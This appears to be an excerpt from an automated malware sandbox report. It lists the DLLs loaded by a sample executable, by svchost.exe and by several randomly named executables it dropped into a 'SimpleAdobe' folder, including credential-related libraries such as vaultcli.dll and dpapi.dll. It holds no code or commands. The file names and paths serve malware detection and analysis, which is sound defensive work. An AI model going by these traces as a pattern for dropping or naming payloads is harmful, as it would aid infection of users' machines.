Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msidle.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncasvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: httpprxp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wpdbusenum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceconnectapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: acgenral.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: samcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: msacm32.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: aclayers.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: sfc.dll
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: d3d11.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: dxgi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: dxcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: webio.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: schannel.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: oleacc.dll
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Section loaded: ntmarta.dll
